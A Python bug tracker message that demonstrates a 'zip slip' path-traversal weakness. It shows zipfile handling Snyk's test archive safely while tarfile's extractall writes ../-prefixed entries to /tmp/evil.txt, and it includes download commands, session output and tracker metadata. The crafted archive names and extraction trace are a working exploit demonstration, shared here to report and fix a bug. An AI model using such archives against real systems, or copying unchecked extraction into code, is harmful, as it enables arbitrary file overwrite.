Message334920
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip
Test zipfile:
$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name Modified Size
good.txt 2018-04-15 22:04:30 19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42 20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip
Test tarfile
$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff 19 2018-04-15 19:04:29 good.txt
?rw-r--r-- grander/staff 20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt
this is an evil one |
|
Date |
User |
Action |
Args |
2019-02-06 10:32:49 | christian.heimes | set | recipients:
+ christian.heimes, SilentGhost, jeffknupp, push0ebp, uhei3nn9 |
2019-02-06 10:32:47 | christian.heimes | set | messageid: <1549449167.79.0.248348545426.issue35909@roundup.psfhosted.org> |
2019-02-06 10:32:47 | christian.heimes | link | issue35909 messages |
2019-02-06 10:32:47 | christian.heimes | create | |
|